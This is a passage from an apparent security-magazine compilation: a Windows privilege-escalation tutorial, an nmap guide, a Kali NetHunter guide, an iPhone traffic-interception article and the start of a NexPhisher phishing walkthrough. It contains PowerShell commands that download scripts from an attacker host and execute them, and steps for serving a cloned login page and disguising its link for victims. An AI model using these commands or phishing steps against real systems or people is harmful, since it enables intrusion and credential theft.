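One caveat this simplified check shares with any KB-list comparison: it does not model superseding updates, so a host that received a later cumulative rollup instead of the exact KB in the table is reported as missing the patch. Treat the output as a list of candidates to verify, the same way the article treats the tool’s suggestions.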

2. PowerShell Scripts Execution


If it is not possible to escalate privilege with the previous methods, we are going to see how to get it through
PowerShell scripts. The most popular are shown below.

• Sherlock.ps1

• PowerUp.ps1

In both cases, you download the PowerShell script to the hacking machine and transfer it to the victim machine. To
do this, we first start an HTTP server on our hacking machine in the directory where ‘Sherlock.ps1’ is
located.

python -m SimpleHTTPServer 80

Then, from the victim machine, we execute the following command to download and execute the module named
‘Find-AllVulns’ in Sherlock.ps1.

• PowerShell

IEX(New-Object Net.Webclient).downloadString('http://<ATTACKER_IP>:<PORT>/Sherlock.ps1');Find-AllVulns

• CMD

powershell.exe IEX(New-Object Net.Webclient).downloadString('http://<ATTACKER_IP>:<PORT>/Sherlock.ps1');Find-AllVulns

For the script named PowerUp.ps1, we execute the module named ‘Invoke-AllChecks’, as we can see below.

• PowerShell

IEX(New-Object Net.Webclient).downloadString('http://<ATTACKER_IP>:<PORT>/PowerUp.ps1');Invoke-AllChecks

• CMD

powershell.exe IEX(New-Object Net.Webclient).downloadString('http://<ATTACKER_IP>:<PORT>/PowerUp.ps1');Invoke-AllChecks

The output will show a list of possible vulnerabilities and exploits to elevate privileges, as we can see in the following
image.


26 PowerShell script output

However, you may find suggested exploits written in various languages, such as C or Python. In that case, you have
to convert them into executable files, such as .exe.

For C source, you can use the ‘i686-w64-mingw32-gcc’ cross-compiler to build a Windows executable, as we can see
below.

i686-w64-mingw32-gcc -o exploit.exe exploit.c

I encourage you to investigate how to convert other languages’ scripts into executable files, such as Python or Perl.

Our work from this point will be to execute and try exploits to obtain elevation of privileges, such as we could see
previously.

Conclusion

In the ethical hacking world, there are hundreds of methods and techniques to learn. In this article, we have only seen
an overview of a manual penetration test with a summary of the most interesting and useful tools.

The real intention is to show how an ethical hacker is able to hack systems with a few basic techniques. However, the real
secret is to be patient and to be eager to learn and investigate continuously.


If you are interested in this topic, you can practise on a lot of free platforms such as Hack the box or Vulnhub or, even,
participate in CTF challenges. I encourage you to do it!

References

1. https://github.com/21y4d/nmapAutomator

2. https://github.com/Tib3rius/AutoRecon

3. https://nmap.org/

4. https://www.openvas.org/

5. https://www.zaproxy.org/

6. https://es-la.tenable.com/products/nessus

7. https://github.com/scipag/vulscan

8. https://github.com/vulnersCom/nmap-vulners

9. https://www.exploit-db.com/

10. https://www.exploit-db.com/searchsploit

11. https://github.com/rapid7/metasploit-framework

12. https://www.offensive-security.com/metasploit-unleashed/msfvenom/

13. https://github.com/mzet-/linux-exploit-suggester

14. https://github.com/rebootuser/LinEnum

15. https://github.com/sleventyeleven/linuxprivchecker

16. https://github.com/AonCyberLabs/Windows-Exploit-Suggester

17. https://github.com/rasta-mouse/Sherlock

18. https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc

About the Author

NMAP, THE
PERFECT
TOOL
DANIEL GARCÍA BAAMEIRO
Daniel García Baameiro is passionate about hacking. A computer engineer from the Complutense University, he holds a
master's degree in cybersecurity from the Carlos III University and is certified by the OSCP. During his professional
career, he has dedicated himself exclusively to the offensive side.

Currently, he teaches the subject "Offensive Security" at the International Graduate School and works as a Red Team
member for the company ISDEFE.

If you liked the article, don't hesitate to give him feedback! He will appreciate it very much:
daniel@garciabaameiro.com

His website is the following: http://garciabaameiro.com

194
NMAP, The Perfect Tool

DEDICATION

I would like to dedicate this article to Erik, a great hacking and free culture enthusiast. In fact, it was thanks to him that I
got to know Hakin9 magazine. Never stop learning!

INTRODUCTION

When I decided to write this article under the theme proposed by the Hakin9 team of "Best tools and techniques for
hackers", my first thought was "nmap". This tool, key in a cybersecurity arsenal, allows information to be gathered about an
asset. This information can be gathered by scanning ports, detecting the operating system or even obtaining information
about the services present on a device.

This article is oriented both for those who have never performed a port scan before and for those who are performing an
offensive security certification such as the well-known OSCP. After reading it, the reader will be able to understand what
the tool does with each type of scan and how to adapt them accordingly.

PORT SCANNING

When we talk about ports in computing, also known as network ports or system ports, we are talking about a feature of
operating systems used to create connections between devices and exchange information over a network. Many such
connections can exist simultaneously, since the device’s IP address is the same but each connection is addressed to a
different port.

These ports are indicated through the network segments of the transport layer (following the OSI model), in which two data
transmission protocols known as TCP and UDP can be found.

TCP scanning

TCP, known as Transmission Control Protocol, is a connection-oriented network protocol. Simply put, for every packet sent
to a remote device, it is expected to receive another packet from the remote device indicating that it has received it. To
understand the types of scans that are performed with the nmap tool on this protocol, it is important to understand and
know its network segment.

TCP frame segment

A segment of a TCP/IP frame includes the application layer information together with a layer added by the transport
protocol. This segment is located inside the IP protocol segment. Visually, it looks like this:


Image from: https://upload.wikimedia.org/wikipedia/commons/d/da/TCP_header.png

Within this image, the field reserved for the segment flags has been highlighted. By using these flags, it is possible to
indicate with a packet that you want to establish a connection, confirm the reception of a packet, terminate a connection,
etc. The most important flags, or at least the ones to be taken into account, are listed below:

SYN: This flag is set when a new connection is to be initiated. For example, in a 3-way connection, a client sends a
TCP packet with the SYN segment active. After that, it gets a response from the server indicating that it has
received it and wants to establish a connection, so that information can be exchanged, with a TCP packet with the
SYN+ACK flags active. Finally, the client responds with a TCP packet with the ACK flag active, confirming that
communication has been initiated and data can be exchanged.

FIN: This flag is set when a new connection is to be terminated. As an example, a 3-way connection closure works
in the same way as described above, but replacing the SYN flag with the FIN flag.

ACK: This flag is used to indicate the reception of a packet.

RST: This flag is triggered when an unexpected packet is received. It should be noted that an end of connection is
also indicated by the use of this flag.

PSH: This flag tells the receiver to hand the received data to the application immediately, without buffering it.

URG: This flag indicates that the segment carries urgent data that should be given priority. It has fallen into disuse over time.

TCP scan

Having understood the distribution of a TCP segment with its respective flags and the establishment and termination of a
connection, it is time to understand the different types of scans offered by the nmap tool for analysing TCP ports.

The first of the basic scans, which is executed by default when no scan type is specified, emulates a connection
establishment request without completing the handshake: when the server replies, the attacking machine never sends the
final response. For this, a TCP segment with the SYN flag set is sent from the attacking machine to the victim machine. The
nmap option to use would be "-sS". Visually, on the network, you would see a result similar to the one shown below:


The second of the recommended scans also emulates a connection initiation request, but this time the handshake is
completed by sending the final response to the server. This option is selected with "-sT". Its execution and result can be
seen in the following image:

The third scan is the opposite of a connection request: it emulates a connection closure. For this option, the "-sF"
flag is used. This scan, along with the next three mentioned below, tends to be among the least used in the enumeration
phase.

As for the fourth scan, a TCP packet is sent but no flag is associated with it. If there is no response, it may be an open or
filtered port. If it responds, it is confirmed that it is closed. This type of scan is mainly used to detect if a port is closed,
rather than to detect if a port is open.

On the other hand, the fifth scan presents a similar behaviour to the one mentioned in the previous paragraph, since in this
case it obtains the same response, but sending a packet with more than one active flag in the request. Specifically, the
"FIN", "PSH" and "URG" flags are activated. Its execution and result can be seen in the following image:


Finally, there is ACK scanning, i.e. scanning by sending segments that acknowledge packet reception to the target hosts.
Through this scan it is not possible to detect whether a port is open or closed. Its purpose is to determine whether there
are security measures implemented by the organisation, such as firewalls.

It should be noted that it is possible to customise our own scan by setting whichever flags we consider appropriate
through the "--scanflags" option. At the same time, it is important to point out that there are more types of scans (such as
-sO, -sM, -sW, etc.), but the ones described above are the most useful in the enumeration phase.

UDP scanning

In contrast to the TCP protocol mentioned in the previous section, the UDP protocol is not connection oriented, so it is not
necessary to use flags to, for example, initiate or terminate a connection. This is why the nmap tool only presents one type
of scan for UDP-based services. Its execution and result can be seen in the following image:

It is important to take into account, especially in order to enumerate an asset properly, that several types of scans have to be
performed. This does not mean that these types only refer to the TCP protocol, but that they should be oriented to the
different protocols and services available on an asset. At the author's recommendation, do not forget to perform this scan.
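The port-state logic behind the scan types above, seen from the defender's side, as an added example that is not part of the original article: it maps each probe type and its reply to the state nmap reports, and it spots sources that sweep many ports with the abnormal flag combinations (NULL, FIN-only, FIN+PSH+URG) that never occur in ordinary traffic. All traffic records are constructed.

```python
"""Added example (not from the article): nmap port-state inference for the
TCP scan types discussed above, plus a detector that spots the abnormal flag
combinations those probes use. All traffic records below are constructed."""

from collections import defaultdict

# TCP flag bits as they appear in the header field highlighted above
FIN, SYN, RST, PSH, ACK, URG = 0x01, 0x02, 0x04, 0x08, 0x10, 0x20

# Flags each probe type sends; names follow the scans described in the text
PROBE_FLAGS = {
    "syn":  SYN,              # -sS (half-open) and -sT (full connect)
    "fin":  FIN,              # -sF
    "null": 0,                # no flags at all
    "xmas": FIN | PSH | URG,  # FIN, PSH and URG together
    "ack":  ACK,              # ACK scan: firewall detection only
}


def infer_port_state(scan, reply):
    """Map a probe type and the flags of the reply (None = no reply) to the
    state nmap reports. ICMP unreachable replies are not modelled here."""
    if scan == "syn":
        if reply is None:
            return "filtered"
        if reply & SYN and reply & ACK:
            return "open"
        if reply & RST:
            return "closed"
    elif scan in ("fin", "null", "xmas"):
        # These probes get no reply from an open port, so open and filtered
        # cannot be told apart; only a RST is conclusive.
        if reply is None:
            return "open|filtered"
        if reply & RST:
            return "closed"
    elif scan == "ack":
        # An ACK probe never reveals open vs closed, only whether something
        # in the path drops it.
        if reply is None:
            return "filtered"
        if reply & RST:
            return "unfiltered"
    return "unknown"


def probe_kind(flags):
    """Name the probe a segment matches exactly, or None for other flag mixes."""
    for name, probe in PROBE_FLAGS.items():
        if flags == probe:
            return name
    return None


def detect_scans(records, threshold=10):
    """records: (src_ip, dst_port, flags). A source that sends one probe
    pattern to at least `threshold` distinct ports is reported as
    {src: {pattern: port_count}}. Bare SYN and ACK segments are ordinary
    traffic, so only their spread across many ports is suspicious."""
    seen = defaultdict(lambda: defaultdict(set))
    for src, dport, flags in records:
        kind = probe_kind(flags)
        if kind is not None:
            seen[src][kind].add(dport)
    report = {}
    for src, kinds in seen.items():
        hits = {k: len(p) for k, p in kinds.items() if len(p) >= threshold}
        if hits:
            report[src] = hits
    return report


# Constructed sample: one host sweeps 20 ports with NULL probes and 12 with
# Xmas probes; another host is just talking to a web server on port 443.
SAMPLE_RECORDS = (
    [("10.0.0.5", p, 0) for p in range(1, 21)]
    + [("10.0.0.5", p, FIN | PSH | URG) for p in range(1000, 1012)]
    + [("10.0.0.9", 443, SYN)]
    + [("10.0.0.9", 443, ACK)] * 50
)

if __name__ == "__main__":
    print(infer_port_state("syn", SYN | ACK))  # open
    print(infer_port_state("null", None))      # open|filtered
    print(detect_scans(SAMPLE_RECORDS))        # {'10.0.0.5': {'null': 20, 'xmas': 12}}
```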

ASSET INFORMATION GATHERING

In the previous section, we have seen how to list the open, closed or filtered ports offered by a device, but what if we want to
know what service is behind it? What if we want to determine the operating system? The nmap tool has functionalities for
this. The following sections explain how to obtain this information.

Scanning of services with their versions

On the one hand, through nmap, it is possible to detect which programs are associated with each service and port. In fact,
not only that, but nmap can even obtain the version of each of the services.

Of course, certain conditions must be met in order to obtain the service and its associated version. If they are not met, a
false positive may be obtained, or the service associated with its respective port may not be detected at all. In order to
perform this type of scan, the "-sV" flag must be used.

Once a scan has been performed with this flag, the result is a response similar to the one shown below:

Scanning the operating system

On the other hand, it is possible to obtain an approximation or probability of the operating system behind a device. In many
cases, this approximation coincides with reality, but false positives or errors can also occur. In order to perform such a scan,
the "-O" flag must be used.

Once a scan has been performed with this flag, the result is a response similar to the one shown below:

NMAP SCRIPTS

Over time, new functionalities have been added to the tool since it was first released. Among these functionalities is the
execution of scripts. These scripts not only aim at enumerating asset information, but may also include an exploit part. This
is why care must be taken when launching these scripts against an asset, knowing at all times what is being executed.

In GNU/Linux distributions, these scripts are found under "/usr/share/nmap/scripts". They are written in Lua, so it tends
to be easy to create your own. To list all scripts, the command "locate *.nse" can be run in a GNU/Linux terminal.

It is recommended that the reader investigate and explore in depth all the scripts offered by this tool, keeping those that can
be most useful to him/her.


Vulnerability detection

Among all the scripts, there is one that is highly recommended and stands out, referenced by the name "vuln". This script
allows detecting vulnerabilities in services and, if it detects one, exposes its associated CVE. Knowing the associated CVE
makes it possible to search for a public exploit, advancing in the pentesting phase. As an example, the use of this
functionality is shown below using the command "nmap --script vuln", which produces a result similar to the one shown
below:

Default scans

There is also a feature of this tool that scans both the operating system and its services and versions at the same time,
also executing the scripts of the "scanning" category. The flag to make use of this functionality is "-A". As an example, the
command "nmap -A" produces a result similar to the one shown below:


AUTHOR'S RECOMMENDATION

During all my cyber security exercises, I have always employed different types of scanning against all assets in a network.
The goal is always to enumerate as many as possible. Of course, one has to keep in mind that performing a port scan,
especially if you are detecting services or vulnerabilities, generates a lot of network traffic. It is important to be aware of all
the features of the nmap tool, because there are techniques to make it difficult for Blue Teams to detect our scans. But that's
for another article!

CONCLUSION

In this article, we have been able to go through the main scans, indicating their differences and categorising them according
to whether they are port, service, operating system or vulnerability oriented. It is important to emphasise that it is not
enough to launch just one type of scan: multiple scans must be launched. At the same time, it is imperative that these scans
perform both TCP and UDP port enumeration. Also, the noise generated in a network must be taken into account, especially
if you want to carry out exercises in which the person emulating an attacker wants to go unnoticed.

KALI NETHUNTER: FOR THOSE THAT HAVE A FEAR OF COMMITMENT
ATLAS STARK
Atlas Stark is a security researcher at Stark Industries Inc. with 16+ years in the technology industry. Currently providing
cyber security solutions and OSINT services to anti-human trafficking non-profits that aid in investigation and victim
recovery. He also consults with state level law enforcement agencies concerning hacking related incidents. He splits his
time between California and Tennessee.

Please email stark@starkinternational.se with any questions or concerns.

204
Kali NetHunter: For Those That Have A Fear Of Commitment

INTRODUCTION:

Do you have a fear of commitment? Are you growing tired of the phrase "Got Root?" Are you driving yourself mad with all
of the "root your phone" tutorials and bad apps? If you answered yes to any of these questions, then this is the article for
you. Whether you are new to penetration testing or a veteran in the biz, you will find some valuable knowledge in this article
and perhaps a new weapon to add to your arsenal. After reading this article you will be able to pick up any stock device and
get Kali NetHunter up and running.

Kali NetHunter is an extremely valuable tool and a game changer within the world of mobile penetration platforms. It is
also more conveniently within reach than you might think. I have specifically chosen the rootless version of Kali NetHunter
for this article because of how approachable it is; if you can utilize basic functionalities of a smartphone then you can
implement this tool. The best part is that the only equipment items needed are a standard issue smartphone, charging
cable, and a positive attitude.

LANDSCAPE:

The current landscape of office environments, shared work-spaces and cafes is bustling with traffic from a variety of
devices including smartphones, watches, tablets, and more. Many of these devices are being used with little to no
security measures in mind. Today, within organizations around the world, you will find a mixed bag of these items being
used at a fast growing rate, from employees to the top level executives; the use of mobile machines is here to stay and we
need a competent way to test these environments.

INSTALLATION

Installation of the rootless version of Kali NetHunter only takes a few moments. Just follow the steps below and, before you
know it, you will be up and running with Kali NetHunter. (I would suggest keeping the phone on the charger during
setup.)

1. Navigate to https://store.nethunter.com/en/ and install the NetHunter store app.

2. Once downloaded, install Termux, NetHunter-KeX Client, and Hacker’s Keyboard from the store interface. (The
hacker’s keyboard is optional, however it does make typing from your device super simple.)

3. Open the Termux interface and enter the commands found in the Step 3 figure.


As you can see from the image in step one, you can scan the QR code or directly download the store app. Either way it works
with the same result, ultimately the choice is yours.


Tip:

In step two, you can use the NetHunter store’s search feature to find Termux if it is not present on the main interface. Just
look for the magnifying glass in the top right corner of the store interface.

Once you are done with the installation, you are greeted with “NetHunter for Termux installed successfully”. What I also
find extremely helpful is that the additional commands are listed after a successful installation on the command line. See
the image from Step 3a.

Here are some additional commands you can use within the NetHunter Termux.


TOOLS:

At this point, you should have the rootless version of Kali NetHunter installed on your standard issue Android device, ready
to explore the environment, so we will move into some of the tools and functionality of NetHunter. (Please use the tools
wisely.)

HackRF

You can use NetHunter with your HackRF One from Great Scott Gadgets to test RF Systems. HackRF One is a great open
source tool for developing and testing modern radio technologies.

NMAP

Nmap works as expected and is an open-source network scanning utility used by the vast majority of security professionals.
Having Nmap at your fingertips on a mobile device opens up a world of possibilities on your next engagement.

AdvPhishing

I installed this tool through the NetHunter Termux shell. AdvPhishing is used to create phishing pages for a variety of
services. More on this particular framework at a later date, due to the dynamic nature of the application. I have provided a
link so you can explore it on your own as well, the resource is located in the references and links section.


Metasploit

MSF console does work on the rootless version of NetHunter with the exception of database support. You are still able to
explore the framework as well as list the many payloads that come with the Metasploit framework. (Metasploit has a lot of
features and is worth exploring further.)


These are just a few tools to get you started with NetHunter and, believe me, there are many more, each with a rich set of
features. As we have barely scratched the surface of the few tools listed, it is now time to explore the platform further.

ENVIRONMENT:

As you explore the environment, you are met with a clean and straightforward interface featuring apps that are available for
you to download and try. When you select an app or feature from the store it loads additional information to help guide
your decision. The screenshots and explanations provided about the tools are an invaluable resource with a vault of insight.
If you can’t find a certain app or plugin there is a floating magnifying glass that is there to assist you when you need it. One
of the features I really like about the amount of detail is that the application tells you if root permissions or a rooted device
is required to continue. Apps will also let you know if the application will function properly within the current configuration
of the device. Each time you engage the NetHunter store app it checks the repository for updates, which is extraordinarily
helpful being that keeping apps up to date is a critical step in maintaining a secure working infrastructure. The Nearby
feature is really handy too as long as at least two parties have the NetHunter Store app installed. The Nearby feature allows
you to swap apps and tools from one user’s device to another via Bluetooth or WiFi - cool, right? As you can see, NetHunter
has a variety of rich resources to offer.


USE CASE:

As stated already, Kali NetHunter is a mobile penetration testing platform. The framework is exceptionally valuable during
engagements that involve social engineering. Being able to utilize a variety of phishing technologies, card-cloning and
scanning techniques to test the workforce and resources in an organization provides the professional with a wealth of
knowledge concerning vulnerabilities that could compromise critical systems within the business; with this knowledge,
both the professional and the administration can work together to devise and implement systems that will strengthen the
overall security. Being able to exploit the human element in any organization is an exceptionally sweet commodity.

ROOTING:

Now I agree that being able to root your device is a cool skill to have as a pentester and it does open up the platform to its
full functionality and purpose, but as for exploring NetHunter with no strings attached, the rootless version makes for an
attractive alternative, especially to new pentesters with limited industry experience or for the individuals that do not wish to
root their device.

Another reason the rootless version was chosen was the ebb and flow of the information out there concerning rooting a
device. Message forums and tech boards are full of conflicting information about the best way to root any number of
Android devices, terminal crashes and conflicting drivers, so with the heavy amount of back and forth, and to not confuse
the reader of this article, we chose the approachable rootless version of Kali NetHunter, plus your device is more like an
investment these days and you retain your warranty by choosing this option. Another major advantage to the rootless
version is that if you are not digging it, then just delete it and move on, that alone is priceless.


HANDS-ON EXAMPLE

As you have already discovered from the article, Kali NetHunter is not only a valuable tool with many functions, it is also
highly versatile and adaptable to any environment. Following is a short hands-on example using the tool Wigle Wifi, which
is available in the NetHunter store. As a reminder, we are using the rootless version of Kali NetHunter.

WIGLE WIFI

In this example, we will pretend we are implementing a “pushing on the fence” scenario for XYZ Organization that hired
you to perform penetration testing and security analysis. Pushing on the fence is when your goal is not to gain access to the
inner sanctum of the company, but to socially exploit the gatekeeper like a front desk attendant while you perform scans
from within the facility. Wigle Wifi is really convenient for this type of interaction because you can execute it simply without
needing to submit arguments in a mobile shell. Below are some screenshots for this hands-on interaction.

Execute Wigle Wifi from the NetHunter dashboard


Application immediately starts scanning the area upon execution.


Even if the bssid is hidden, you can search for any network name that the application detects.


Results from the search; as you can see now you have the bssid.

Menu that allows you to choose several options, you can exit the application from the menu as well. (Tip: Once you are
done with the tool, it is highly advisable to exit the tool to stop the capturing process.)


For this example, we chose to navigate to our Dashboard from the menu. A wealth of information can be had from this
section. I have outlined some of the things I like about the organization.

1. Very quickly I know how many new connections from which sources are being detected.

2. GPS information is priceless in any engagement.

3. Run and Scan duration are a great way to measure the effectiveness of your tool.

I know that was fast, however it really is that straightforward. I would use the information that was gathered during this
scenario to create some files that I could quickly pass to other applications in post follow up, every second counts when we
are using a mobile device. Trust me, any form of automation we can stage in the beginning will make the encounter with the
theater run that much smoother.


We utilized Wigle Wifi without being logged in, I have added some extra content below as a guide if you would like to create
an account.

This is where you will want to register for a new account.

I absolutely love the fact that you do not have to use real information. (Tip: If you use fake credentials, a word to the wise
would be to remember them; I have been burned many times.)


CONCLUSION:

In closing, after you have experimented with this version of NetHunter for awhile and find yourself wanting more, like I
did, I would highly suggest you invest the time and effort and root one of your older devices or try to find a device model
listed on the Kali NetHunter website. This article is meant to provide a high level view of Kali NetHunter not a deep dive
into the abyss. Please take a look at the resources provided under web references and links to enhance your understanding
and assist you if you get stuck along the way. Happy Hacking!

On the Web References and Links:

1. https://www.kali.org/docs/nethunter

2. https://www.kali.org/kali-nethunter

3. https://www.kali.org/docs/general-use/metapackages

4. https://www.kali.org/docs/troubleshooting/common-minimum-setup

5. https://www.kali.org/docs/nethunter/nethunter-rootless

6. https://github.com/Ignitetch/AdvPhishing

Helpful Article:

This article may help you out in deciding if you think the pain of rooting is worth it. It also offers some
helpful insight and thought provoking reflection.

https://www.bullguard.com/bullguard-security-center/mobile-security/mobile-threats/android-rooting-risks.aspx

INTERCEPTING DATA TRAFFIC VIA IPHONE
JORDAN BONAGURA
• CISO and Information Security Researcher - CEH

• Hacker is NOT a Crime Advocate

• Stay Safe (Magazine and Podcasts) Founder

• Computer Scientist

• Post Graduated - Strategic Business Management, Higher Education Methodology Innovation and
Research Methodology

• Organizer of Vale Security Conference - Brazil

• Director Member of Cloud Security Alliance - Brazil

• Advisory Member of Digital Law and High-Tech Crimes OAB (Association of Brazilian Lawyers)

• IT Teacher and Course Coordinator

• SJC Hacker Space Founder

• Speaker (AppSec California, GrrCon, Angeles y Demonios, BSides Augusta, BSides SP, BalCConf2k14,
H2HC, SegInfo, ITA, INPE, CNASI, RoadSec etc.)
220
Intercepting Data Traffic Via IPhone

INTRODUCTION

This article aims to demonstrate, in a simplified way, a different approach for capturing and intercepting network
traffic data originating from an iPhone device.

Obviously, the iPhone is not the only device subject to these approaches, and the strategies presented here are not
the only ones capable of performing such intercepts.

The simplest way to get this data is to use a proxy server. In the first part of this article, we will adopt the BURP
software to exemplify this operation. After collecting the data, we will analyze the packets of a given application
and its connection to the WEB services.

However, if the objective is a more detailed analysis of the traffic of an application that uses communication ports
other than WEB requests, we can diversify the strategy and use a remote virtual interface (RVI), as we will
demonstrate in the second part of this article.

PART 1 - USING A PROXY SERVER – BURP

When we mention the use of a proxy server, we are basically referring to intercepting and analyzing requests
related to the HTTP (Hypertext Transfer Protocol), whether the one with the TLS (Transport Layer Security)
security layer or not.

Some of the applications we have on our smartphones still only use the HTTP protocol, which means that data
travels in plain text form, that is, without any encryption, making sensitive information fully exposed to any
attacker who adopts techniques like man in the middle.

To configure our proxy, the first step is to open BURP. By default, the interface it listens on is the machine itself, that
is, the IP address 127.0.0.1 and port 8080, as we can see in the image below:


In BURP, every capture is by default related to the local machine, but to execute our strategy of intercepting the data that
will reach our server through the iPhone, we will need to add the internal IP of the local machine in the Specific address
field.

Note that in this case we adopt the IP 192.168.1.102 with port 8081. Once BURP is configured, let's go to the iPhone:


Note: The IP address associated with the iPhone has no relationship with the proxy server, but it is obvious that
they will have to be on the same network so that traffic can be captured.

As soon as we finish configuring the iPhone to use BURP as our proxy server, we can already see some packets; this is
because several applications are running in the background, usually software updates, email updates, among others. Below
we have an example of an intercepted packet with the POST method in connection with Office365 for an email update. Note
that DeviceType is already identified as an iPhone.

For demonstration, we used a real healthcare application, more precisely from a healthcare company, and for
ethical reasons, I obviously kept the data hidden.


We can see that when we open the application on our smartphone, API requests to the server are already executed to
exchange information, and with this we can already see the packets, as shown in the image below:

Despite being an application that requires a high level of information secrecy, data is transferred in plain text, that
is, without any encryption involved.

As we can see in the image below, we are not yet talking about access credentials, but in any case, they are sensitive
data, such as the beneficiary number (insurance ID) and telephone number.


Unfortunately, in this application, not only the previously highlighted sensitive data are transferred in plain text,
but also the access credentials (username and password) as we can see in the image below:

This means that if someone were connected to the same network, for example an airport Wi-Fi network, cafeteria,
restaurant, etc., and were running a traffic analyzer when we opened this application, our username and password would
be leaked (man-in-the-middle attack).
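The finding above (credentials and beneficiary data sent over plain HTTP) is exactly what a capture review should flag automatically. As an added example that is not the author's code, the checker below parses raw HTTP requests of the kind Burp and Wireshark display and reports sensitive fields that travelled without TLS; the captures and the sensitive-name list are constructed for the example.

```python
"""Added example (not from the article): scan captured HTTP requests, like the
ones the Burp and Wireshark screenshots above show, for credentials or other
sensitive fields that travelled without TLS. The captures are constructed."""

import json
import re
from urllib.parse import parse_qs, urlsplit

# Parameter names treated as sensitive (assumed list; extend per application)
SENSITIVE = re.compile(
    r"pass(word)?|pwd|senha|user(name)?|token|beneficiar|insurance|phone|telefone",
    re.IGNORECASE,
)


def parse_http_request(raw):
    """Split a raw HTTP/1.1 request into (method, target, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers, body


def body_fields(headers, body):
    """Return body parameters as a dict for form-encoded or JSON bodies."""
    ctype = headers.get("content-type", "")
    if "json" in ctype:
        try:
            data = json.loads(body)
        except json.JSONDecodeError:
            return {}
        return {k: str(v) for k, v in data.items()} if isinstance(data, dict) else {}
    if "x-www-form-urlencoded" in ctype:
        return {k: v[0] for k, v in parse_qs(body).items()}
    return {}


def plaintext_findings(captures):
    """captures: list of (is_tls, raw_request). Returns (path, field, where)
    for every sensitive parameter carried by a request that was not under TLS.
    Requests Burp shows after terminating TLS are skipped: the point here is
    only what an on-path observer on the same Wi-Fi could read."""
    findings = []
    for is_tls, raw in captures:
        if is_tls:
            continue
        _method, target, headers, body = parse_http_request(raw)
        parts = urlsplit(target)
        # Query-string parameters are also logged by proxies and servers
        for field in parse_qs(parts.query):
            if SENSITIVE.search(field):
                findings.append((parts.path, field, "query"))
        for field in body_fields(headers, body):
            if SENSITIVE.search(field):
                findings.append((parts.path, field, "body"))
    return findings


# Constructed captures modelled on the healthcare app described in the text
CAPTURES = [
    (False,
     "POST /api/v1/login HTTP/1.1\r\nHost: app.example.com\r\n"
     "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
     "username=alice&password=hunter2&remember=1"),
    (False,
     "GET /api/v1/beneficiary?beneficiaryNumber=12345&phone=5551234 HTTP/1.1\r\n"
     "Host: app.example.com\r\n\r\n"),
    (True,
     "POST /api/v1/login HTTP/1.1\r\nHost: secure.example.com\r\n"
     "Content-Type: application/json\r\n\r\n"
     '{"username": "bob", "password": "s3cret"}'),
]

if __name__ == "__main__":
    for finding in plaintext_findings(CAPTURES):
        print("cleartext sensitive field:", finding)
```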

PART 2 - USING A REMOTE VIRTUAL INTERFACE (RVI) – WIRESHARK

Another approach that can sometimes be more interesting is to analyze all the network traffic that occurs between the
iPhone device and the application servers, now not only focused on WEB applications and requests (HTTP), but on
different protocols.

To implement this, we start with the connection of our iPhone via USB to the computer that will run Wireshark for data
collection, then we will create the RVI (Remote Virtual Interface) where we will need to pass the UUID (Universal Unique
Identifiers) of the iPhone as a parameter.

Through "Finder" it is possible to discover the device UUID, just click on the name of the connected device and the
information will appear as shown in the image below:

Having the device UUID and being connected, it is necessary to activate the virtual interface (RVI), using the following
command:


After receiving the SUCCEEDED message, we are ready with the interface enabled and then we can go to the Wireshark
network traffic analyzer opening and select the rvi0 interface.

In this example, and even for comparison purposes with the previous model, we adopted the same healthcare application
and applied a basic filter (ip.src == 192.168.1.23) to facilitate viewing only the source IP (iPhone). It is possible to view
protocols from different layers of the OSI model. In this example, we have protocols from the transport layer (TCP)
as well as from the application layer (HTTP) as seen in the image below:


Analyzing only the HTTP packets, it is possible to analyze the same information that we saw previously in BURP.

So, if we open the content of our selected packet, we will also have all the previously demonstrated credential
information, as shown in the image below:

CONCLUSION


We could verify that there are different approaches to capturing data traffic from an iPhone. In the first part, we
demonstrated the technique with the adoption of a proxy server (BURP), where it was possible to analyze packets related
to WEB requests; this technique is easier to implement, but often limited. In the second part, we demonstrated a broader
analysis, where it was possible to verify that protocols from different layers can also be analyzed. Therefore, depending
on the desired objective and/or the form of communication of the application, this may be more suitable.

It is worth remembering that both techniques are complementary, therefore, depending on the application's final
analysis objective, both can be combined.

The way has been shown; now it is up to you to follow it and carry out an in-depth analysis of your applications.

Stay Safe

PHISHING USING NEXPHISHER
MAYUKH PAUL
I am a typical college student with a keen interest in the field of cybersecurity and social engineering. The art of
psychologically manipulating people into performing actions or divulging confidential information intrigues me. I enjoy
trying out new tools and exploiting new vulnerabilities. The more vulnerabilities I exploit, the more my urge to learn
increases. I aim to dive more into the field of cybersecurity research and protect company security against cyber threats.

230
Phishing Using Nexphisher

Phishing is a category of social engineering attack often used to trick a victim and steal their data, such as login credentials,
credit card details, PIN, etc.

Phishing takes place when an attacker deceives a victim into opening a malicious link through email, messages, etc., which
leads to a ransomware attack, installation of malware, and in most cases revealing sensitive information, which might lead
to huge losses. Such an attack might be very devastating to the user as it might lead to identity theft, unauthorized
purchases, or stealing of funds.

Some of the common types of phishing are:

• Spear Phishing: This type of phishing is mostly targeted to a specific group or individual.

• Whaling: This type of phishing attack is targeted to an employee in a high position, such as CEO, CTO, etc.

• Smishing: This attack is executed by using text messages or SMS.

• Vishing: This attack is executed over a voice call. Vishing is short for Voice Phishing.

• Search Engine Phishing: This type of phishing involves the attacker aiming to be the top search of a search
engine to trick a mass amount of users. Clicking on the link, the users are tricked into visiting their malicious
website.

Let me show you how easy it is to create a phishing page for various social media sites. Here I have NexPhisher, an
automated phishing tool with 37 page templates. It also has five port forwarding options.

You can clone NexPhisher from here: https://github.com/htr-tech/nexphisher

To start up NexPhisher once installed we use the command ‘bash nexphisher’ as NexPhisher is written in shell.

NexPhisher has initial 30 templates of different social media.


Let’s try cloning a twitch page to phish for a twitch username and password.

Next, we get five port forwarding options:

LocalHost

Ngrok

Serveo

LocalXpose

LocalHostRun

Here, I select ngrok to host the phishing link globally.

NexPhisher creates a phishing page and initializes it to localhost, which gets forwarded to ngrok.

A phishing link is generated, which can then be sent to the victim.

The attacker can use various social engineering techniques to convince the victim to click on the link and enter their
credentials. Here, I used a link shortener to shorten the created link to make it look less suspicious.


Let’s take a look at the victim’s side. Once the victim opens the link, a well-cloned twitch page asking for login credentials is
seen.

